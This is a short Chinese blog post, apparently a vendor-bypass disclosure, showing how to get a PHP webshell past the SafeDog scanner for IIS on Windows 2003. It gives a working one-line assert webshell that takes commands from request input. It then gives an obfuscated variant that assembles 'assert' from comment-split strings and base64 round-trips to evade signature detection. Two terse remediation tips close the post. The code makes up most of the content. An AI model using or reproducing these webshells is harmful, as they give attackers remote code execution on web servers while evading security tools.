奇淫巧技绕过安全狗webshell查杀及修复建议 – 网站

时间: 2020-10-11|tag: 31次围观|0 条评论

测试环境:windows2003

 

安全狗版本:iis3.3最新版

原形

<?php assert($_REQUEST["AG"]);?>

 

奇淫巧技绕过安全狗webshell查杀及修复建议 – 网站插图

处理掉assert的函数原形即可绕过
 

<?php 

$jm='MQ==';

$s=base64_decode($jm);

$a="a"./*-/*-*/"ss"./*-/*-*/"er"./*-/*-*/"t";

$b=base64_encode($a); 

$c=base64_decode($b);

$c($_REQUEST[$s]);

?>

 

奇淫巧技绕过安全狗webshell查杀及修复建议 – 网站插图1

 

修复方案:

#1.增加相应的查杀库

#2.用正则过滤掉垃圾字符再用特征库识别效果会好一些
    上一篇: 药房网APP某处横向权限问题及修复 - 网站安全

    下一篇: 网易邮箱某处XXE可读取文件 - 网站安全 - 自学p
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《奇淫巧技绕过安全狗webshell查杀及修复建议 – 网站
   

还没有人抢沙发呢~